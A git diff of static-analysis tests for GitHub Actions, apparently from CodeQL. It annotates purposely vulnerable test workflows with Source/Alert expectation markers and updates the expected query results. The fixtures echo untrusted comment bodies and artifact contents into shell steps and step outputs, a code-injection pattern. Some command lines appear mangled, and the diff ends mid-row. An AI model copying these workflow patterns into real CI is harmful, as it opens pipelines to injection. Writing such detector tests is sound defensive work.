.../CWE-094/.github/workflows/level1.yml | 2 +- .../.github/workflows/priv_pull_request.yml | 2 +- .../.github/workflows/pull_request_review.yml | 16 +- .../workflows/pull_request_review_comment.yml | 16 +- .../.github/workflows/pull_request_target.yml | 16 +- .../CWE-094/.github/workflows/push.yml | 20 +- .../workflows/push_and_workflow_dispatch.yml | 20 +- .../.github/workflows/reusable-workflow-1.yml | 10 +- .../.github/workflows/reusable-workflow-2.yml | 10 +- .../workflows/reusable-workflow-caller-1.yml | 2 +- .../workflows/reusable-workflow-caller-2.yml | 2 +- .../workflows/reusable-workflow-caller-3.yml | 2 +- .../CWE-094/.github/workflows/self_needs.yml | 6 +- .../CWE-094/.github/workflows/simple1.yml | 4 +- .../CWE-094/.github/workflows/simple2.yml | 4 +- .../CWE-094/.github/workflows/simple3.yml | 4 +- .../.github/workflows/slash_command2.yml | 2 +- .../CWE-094/.github/workflows/test.yml | 4 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test10.yml | 12 +- .../CWE-094/.github/workflows/test11.yml | 6 +- .../CWE-094/.github/workflows/test12.yml | 2 +- .../CWE-094/.github/workflows/test13.yml | 8 +- .../CWE-094/.github/workflows/test14.yml | 16 +- .../CWE-094/.github/workflows/test15.yml | 16 +- .../CWE-094/.github/workflows/test16.yml | 8 +- .../CWE-094/.github/workflows/test17.yml | 16 +- .../CWE-094/.github/workflows/test18.yml | 4 +- .../CWE-094/.github/workflows/test19.yml | 84 ++--- .../CWE-094/.github/workflows/test2.yml | 8 +- .../CWE-094/.github/workflows/test20.yml | 2 +- .../CWE-094/.github/workflows/test21.yml | 6 +- .../CWE-094/.github/workflows/test24.yml | 4 +- .../CWE-094/.github/workflows/test25.yml | 4 +- .../CWE-094/.github/workflows/test26.yml | 6 +- .../CWE-094/.github/workflows/test27.yml | 4 +- .../CWE-094/.github/workflows/test29.yml | 2 +- .../CWE-094/.github/workflows/test3.yml | 4 +- .../CWE-094/.github/workflows/test4.yml | 6 +- .../CWE-094/.github/workflows/test5.yml | 2 +- .../CWE-094/.github/workflows/test7.yml | 8 +- .../CWE-094/.github/workflows/test8.yml | 4 +- .../CWE-094/.github/workflows/test9.yml | 12 +- .../.github/workflows/untrusted_checkout1.yml | 4 +- .../.github/workflows/workflow_run.yml | 16 +- .../workflows/workflow_run_branches1.yml | 2 +- .../workflows/workflow_run_branches2.yml | 2 +- .../workflows/workflow_run_branches3.yml | 2 +- .../workflows/workflow_run_branches4.yml | 2 +- .../workflows/workflow_run_branches5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 334 +++++++++--------- .../CWE-094/CodeInjectionCritical.qlref | 3 +- .../CWE-094/CodeInjectionMedium.expected | 118 +++---- .../CWE-094/CodeInjectionMedium.qlref | 3 +- .../CWE-1395/.github/workflows/test1.yml | 4 +- .../CWE-1395/UseOfKnownVulnerableAction.qlref | 4 +- .../CWE-200/.github/workflows/test1.yml | 2 +- .../CWE-200/SecretExfiltration.expected | 4 +- .../Security/CWE-200/SecretExfiltration.qlref | 4 +- .../CWE-275/.github/workflows/perms1.yml | 2 +- .../CWE-275/.github/workflows/perms10.yml | 2 +- .../CWE-275/.github/workflows/perms2.yml | 2 +- .../CWE-275/.github/workflows/perms5.yml | 2 +- .../CWE-275/.github/workflows/perms6.yml | 2 +- .../CWE-275/.github/workflows/perms7.yml | 2 +- .../CWE-275/.github/workflows/perms8.yml | 2 +- .../CWE-275/.github/workflows/perms9.yml | 2 +- .../CWE-275/MissingActionsPermissions.qlref | 4 +- .../CWE-284/.github/workflows/test1.yml | 16 +- .../CodeExecutionOnSelfHostedRunner.qlref | 4 +- .../CWE-285/.github/workflows/test1.yml | 2 +- .../CWE-285/ImproperAccessControl.qlref | 4 +- .../workflows/secrets-in-artifacts.yml | 10 +- .../CWE-312/.github/workflows/test1.yml | 10 +- .../CWE-312/ExcessiveSecretsExposure.qlref | 4 +- .../Security/CWE-312/SecretsInArtifacts.qlref | 4 +- .../CWE-312/UnmaskedSecretExposure.qlref | 4 +- .../.github/workflows/code_injection1.yml | 2 +- .../.github/workflows/direct_cache1.yml | 4 +- .../.github/workflows/direct_cache2.yml | 4 +- .../.github/workflows/direct_cache3.yml | 4 +- .../.github/workflows/direct_cache4.yml | 4 +- .../.github/workflows/direct_cache5.yml | 4 +- .../.github/workflows/direct_cache6.yml | 4 +- .../.github/workflows/poisonable_step1.yml | 10 +- .../.github/workflows/poisonable_step2.yml | 4 +- .../.github/workflows/poisonable_step3.yml | 2 +- .../.github/workflows/poisonable_step4.yml | 2 +- .../.github/workflows/poisonable_step5.yml | 4 +- .../CachePoisoningViaCodeInjection.expected | 4 +- .../CachePoisoningViaCodeInjection.qlref | 4 +- .../CachePoisoningViaDirectCache.expected | 14 +- .../CachePoisoningViaDirectCache.qlref | 4 +- .../CachePoisoningViaPoisonableStep.expected | 16 +- .../CachePoisoningViaPoisonableStep.qlref | 4 +- .../CWE-367/.github/workflows/comment.yml | 6 +- .../CWE-367/.github/workflows/test0.yml | 6 +- .../CWE-367/.github/workflows/test4.yml | 4 +- .../CWE-367/.github/workflows/test5.yml | 8 +- .../CWE-367/.github/workflows/test6.yml | 10 +- .../UntrustedCheckoutTOCTOUCritical.expected | 22 +- .../UntrustedCheckoutTOCTOUCritical.qlref | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 3 +- .../CWE-571/.github/workflows/test1.yml | 22 +- .../CWE-571/.github/workflows/test2.yml | 22 +- .../ExpressionIsAlwaysTrueCritical.qlref | 3 +- .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 3 +- .../actions/dangerous-git-checkout/action.yml | 2 +- .../actions/download-artifact-2/action.yaml | 2 +- .../actions/download-artifact/action.yaml | 2 +- .../.github/actions/unpinned-tag/action.yml | 2 +- .../workflows/actor_trusted_checkout.yml | 4 +- .../workflows/artifactpoisoning101.yml | 6 +- .../.github/workflows/artifactpoisoning11.yml | 4 +- .../.github/workflows/artifactpoisoning12.yml | 4 +- .../.github/workflows/artifactpoisoning21.yml | 6 +- .../.github/workflows/artifactpoisoning22.yml | 6 +- .../.github/workflows/artifactpoisoning31.yml | 4 +- .../.github/workflows/artifactpoisoning32.yml | 4 +- .../.github/workflows/artifactpoisoning33.yml | 4 +- .../.github/workflows/artifactpoisoning34.yml | 4 +- .../.github/workflows/artifactpoisoning41.yml | 4 +- .../.github/workflows/artifactpoisoning42.yml | 4 +- .../.github/workflows/artifactpoisoning71.yml | 6 +- .../.github/workflows/artifactpoisoning81.yml | 4 +- .../.github/workflows/artifactpoisoning91.yml | 4 +- .../.github/workflows/artifactpoisoning92.yml | 6 +- .../.github/workflows/artifactpoisoning96.yml | 2 +- .../CWE-829/.github/workflows/auto_ci.yml | 18 +- .../CWE-829/.github/workflows/dependabot2.yml | 2 +- .../CWE-829/.github/workflows/dependabot3.yml | 4 +- .../TestRepo/.github/workflows/reusable.yml | 4 +- .../CWE-829/.github/workflows/gitcheckout.yml | 4 +- .../issue_comment_3rd_party_action.yml | 6 +- .../workflows/issue_comment_direct.yml | 10 +- .../workflows/issue_comment_heuristic.yml | 4 +- .../workflows/issue_comment_octokit.yml | 12 +- .../workflows/issue_comment_octokit2.yml | 8 +- .../workflows/label_trusted_checkout1.yml | 4 +- .../workflows/label_trusted_checkout2.yml | 6 +- .../CWE-829/.github/workflows/level0.yml | 10 +- .../CWE-829/.github/workflows/mend.yml | 4 +- .../CWE-829/.github/workflows/poc.yml | 8 +- .../CWE-829/.github/workflows/poc2.yml | 6 +- .../CWE-829/.github/workflows/poc3.yml | 2 +- .../CWE-829/.github/workflows/pr-workflow.yml | 44 +-- .../workflows/priv_pull_request_checkout.yml | 2 +- .../.github/workflows/resolve-args.yml | 2 +- .../.github/workflows/reusable_local.yml | 4 +- .../CWE-829/.github/workflows/test10.yml | 4 +- .../CWE-829/.github/workflows/test11.yml | 4 +- .../CWE-829/.github/workflows/test12.yml | 2 +- .../CWE-829/.github/workflows/test13.yml | 4 +- .../CWE-829/.github/workflows/test14.yml | 4 +- .../CWE-829/.github/workflows/test15.yml | 4 +- .../CWE-829/.github/workflows/test17.yml | 6 +- .../CWE-829/.github/workflows/test18.yml | 6 +- .../CWE-829/.github/workflows/test22.yml | 2 +- .../CWE-829/.github/workflows/test25.yml | 4 +- .../CWE-829/.github/workflows/test27.yml | 4 +- .../CWE-829/.github/workflows/test28.yml | 2 +- .../CWE-829/.github/workflows/test29.yml | 4 +- .../CWE-829/.github/workflows/test3.yml | 2 +- .../CWE-829/.github/workflows/test4.yml | 2 +- .../CWE-829/.github/workflows/test7.yml | 12 +- .../CWE-829/.github/workflows/test8.yml | 2 +- .../CWE-829/.github/workflows/test9.yml | 2 +- .../.github/workflows/unpinned_tags.yml | 6 +- .../.github/workflows/untrusted_checkout.yml | 8 +- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../.github/workflows/untrusted_checkout3.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 8 +- .../workflow_run_untrusted_checkout.yml | 4 +- .../workflow_run_untrusted_checkout_2.yml | 4 +- .../ArtifactPoisoningCritical.expected | 38 +- .../CWE-829/ArtifactPoisoningCritical.qlref | 4 +- .../CWE-829/ArtifactPoisoningMedium.expected | 2 +- .../CWE-829/ArtifactPoisoningMedium.qlref | 4 +- .../ArtifactPoisoningPathTraversal.qlref | 4 +- .../Security/CWE-829/UnpinnedActionsTag.qlref | 3 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutCritical.qlref | 3 +- .../CWE-829/UntrustedCheckoutHigh.qlref | 3 +- .../CWE-829/UntrustedCheckoutMedium.qlref | 3 +- .../CWE-829/UnversionedImmutableAction.qlref | 3 +- .../CWE-918/.github/workflows/test.yml | 2 +- .../Security/CWE-918/RequestForgery.expected | 4 +- .../Security/CWE-918/RequestForgery.qlref | 3 +- .../.github/workflows/malformed.yml | 2 +- .../query-tests/SyntaxError/SyntaxError.qlref | 3 +- .../workflows/defaultable_workflow.yml | 2 +- .../UnnecessaryUseOfAdvancedConfig.qlref | 3 +- 284 files changed, 1180 insertions(+), 1156 deletions(-) diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml index c2e9e17160d3..de43f610827a 100644 --- a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -3,14 +3,14 @@ name: Reusable workflow example on: workflow_call: inputs: - config-path: + config-path: # $ Source[actions/reusable-workflow-sinks] Source[actions/reusable-workflow-summaries] required: true type: string outputs: workflow-output1: - value: ${{ jobs.job1.outputs.job-output1 }} + value: ${{ jobs.job1.outputs.job-output1 }} # $ Alert[actions/reusable-workflow-summaries] workflow-output2: - value: ${{ jobs.job1.outputs.job-output2 }} + value: ${{ jobs.job1.outputs.job-output2 }} # $ Alert[actions/reusable-workflow-sources] secrets: token: required: true @@ -26,9 +26,9 @@ jobs: env: CONFIG_PATH: ${{ inputs.config-path }} run: | - echo ${{ inputs.config-path }} + echo ${{ inputs.config-path }} # $ Alert[actions/reusable-workflow-sinks] echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 - uses: tj-actions/changed-files@v40 + uses: tj-actions/changed-files@v40 # $ Source[actions/reusable-workflow-sources] diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected index 0a5bfe433e91..33f7bd28de6f 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected @@ -1,3 +1,6 @@ +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | @@ -10,6 +13,3 @@ nodes | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | | action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | -| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref index e5cb225ed249..d03797620365 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1,2 @@ -Models/CompositeActionsSinks.ql +query: Models/CompositeActionsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected index 3be74bb8bf12..3f13be734e2e 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,3 +1,9 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | edges | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | @@ -13,9 +19,3 @@ nodes | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref index 3b833d669125..fcdfec84bb78 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSources.ql - +query: Models/CompositeActionsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected index 067edb68bb1c..43db3e5afa27 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -1,3 +1,5 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | @@ -8,5 +10,3 @@ nodes | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index ea9b7a304e6b..7508e12c9815 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSummaries.ql - +query: Models/CompositeActionsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected index 18e9f0186dfd..3a496c7751e8 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | edges | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | @@ -20,5 +22,3 @@ nodes | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index fa8344d4bf91..8cc9921223a3 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSinks.ql - +query: Models/ReusableWorkflowsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected index c76034f74d46..c9132156dad9 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | edges | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | @@ -8,5 +10,3 @@ nodes | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths -#select -| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index fe4299bdba49..4a35c574ad5b 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSources.ql - +query: Models/ReusableWorkflowsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected index 8589d82d8259..2a6c4269d525 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | @@ -12,5 +14,3 @@ nodes | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index 3547c8a4d07d..7655b5f8010a 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSummaries.ql - +query: Models/ReusableWorkflowsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml index 787fb9f588be..4780a1529f83 100644 --- a/actions/ql/test/query-tests/Models/action1/action.yml +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -1,17 +1,17 @@ name: 'Hello World' description: 'Greet someone' inputs: - who-to-greet: # id of input + who-to-greet: # id of input # $ Source[actions/composite-action-sinks] Source[actions/composite-action-summaries] description: 'Who to greet' required: true default: 'World' outputs: reflected: description: "Reflected input" - value: ${{ steps.reflector.outputs.reflected }} + value: ${{ steps.reflector.outputs.reflected }} # $ Alert[actions/composite-action-sources] Alert[actions/composite-action-summaries] tainted: description: "Reflected input" - value: ${{ steps.source.outputs.tainted}} + value: ${{ steps.source.outputs.tainted}} # $ Alert[actions/composite-action-sources] runs: using: "composite" @@ -29,23 +29,23 @@ runs: find: 'foo' replace: '' - id: sink - run: echo ${{ steps.replace.outputs.value }} + run: echo ${{ steps.replace.outputs.value }} # $ Alert[actions/composite-action-sinks] shell: bash - name: Vulnerable Set Greeting - run: echo "Hello ${{ inputs.who-to-greet }}." + run: echo "Hello ${{ inputs.who-to-greet }}." # $ Alert[actions/composite-action-sinks] shell: bash - id: reflector run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT shell: bash env: - INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} # $ Source[actions/composite-action-sources] - id: changed-files uses: tj-actions/changed-files@v40 - - id: source + - id: source # $ Source[actions/composite-action-sources] run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT shell: bash env: - TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} # $ Source[actions/composite-action-sources] diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml index 01036f711481..73368388c9fd 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml @@ -6,11 +6,11 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT # $ Alert - id: clob2 run: | echo ${{ steps.clob1.outputs.OUTPUT_1 }} @@ -32,8 +32,8 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT - echo "OUTPUT_2=$(> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index 614de61b0cb7..0e57bee8ac9a 100644 --- a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -6,18 +6,18 @@ jobs: steps: - id: clob1 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo $BODY - echo "::set-output name=OUTPUT::SAFE" + echo "::set-output name=OUTPUT::SAFE" # $ Alert - id: clob2 env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" - echo $BODY + echo $BODY # $ Alert - id: clob3 run: | echo ${{ steps.clob1.outputs.OUTPUT }} @@ -38,25 +38,25 @@ jobs: with: run_id: ${{ github.event.workflow_run.id }} name: pr_number - - id: clob1 + - id: clob1 # $ Source run: | # VULNERABLE PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> 